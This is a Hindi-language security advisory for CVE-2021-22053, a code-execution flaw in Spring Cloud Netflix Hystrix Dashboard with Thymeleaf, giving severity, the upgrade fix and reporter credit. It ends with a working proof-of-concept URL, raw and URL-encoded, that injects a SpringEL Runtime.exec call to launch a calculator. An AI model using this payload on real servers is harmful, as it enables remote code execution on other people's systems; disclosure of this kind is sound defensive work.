
Spring Cloud Netflix Hystrix Dashboard टेम्पलेट रिज़ॉल्यूशन भेद्यता CVE-2021-22053
उच्च
VMware द्वारा Spring
दोनों spring-cloud-netflix-hystrix-dashboard और spring-boot-starter-thymeleaf का उपयोग करने वाले अनुप्रयोग, व्यू टेम्पलेट्स के रिज़ॉल्यूशन के दौरान अनुरोध URI पथ में प्रस्तुत कोड को निष्पादित करने का एक तरीका उजागर करते हैं। जब /hystrix/monitor;[user-provided data] पर अनुरोध किया जाता है, तो hystrix/monitor के बाद के पथ तत्वों का मूल्यांकन SpringEL अभिव्यक्तियों के रूप में किया जाता है, जिससे कोड निष्पादन हो सकता है।
जब तक अन्यथा न कहा जाए, गंभीरता उच्च है।
प्रभावित संस्करणों के उपयोगकर्ताओं को निम्नलिखित शमन लागू करना चाहिए: उपयोगकर्ताओं को 2.2.10.RELEASE+ पर अपग्रेड करना चाहिए। कोई अन्य कदम आवश्यक नहीं हैं। इस समस्या को ठीक करने वाले रिलीज़ में शामिल हैं:
यह भेद्यता SecCoder Security Lab के threedr3am द्वारा पहचानी गई और जिम्मेदारीपूर्वक रिपोर्ट की गई ([email protected])।
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
2021-11-17: प्रारंभिक भेद्यता रिपोर्ट प्रकाशित हुई।
कच्चा:
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/
एन्कोडेड:
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/
PS. कमांड में विकर्ण बार '/' नहीं दिया जा सकता।